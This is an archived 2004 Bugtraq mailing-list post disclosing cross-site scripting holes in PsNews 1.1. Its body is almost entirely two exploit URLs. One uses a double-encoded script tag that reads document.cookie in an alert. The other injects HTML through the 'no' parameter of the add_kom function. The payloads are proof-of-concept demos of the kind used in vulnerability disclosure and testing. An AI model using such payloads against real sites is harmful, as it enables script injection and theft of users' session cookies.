[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Bug XSS in PsNews 1.1
From:       Michal Blaszczak <wacky () nicponie ! org>
Date:       2004-09-05 18:55:24
Message-ID: 20040905185524.32251.qmail () www ! securityfocus ! com
[Download RAW message or body]



°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
*5-9-2004
*Autor: wacky
*E-mail: wacky@nicponie.org
*WWW: http://www.nicponie.org
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
-----------------------------------------------
> BugCross-Site Scripting (XSS) w PsNews 1.1 | 
-----------------------------------------------

Exploit:

a) 
http://[target]/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script>


b)
http://[target]/index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font>


°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
http://www.nicponie.org/


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic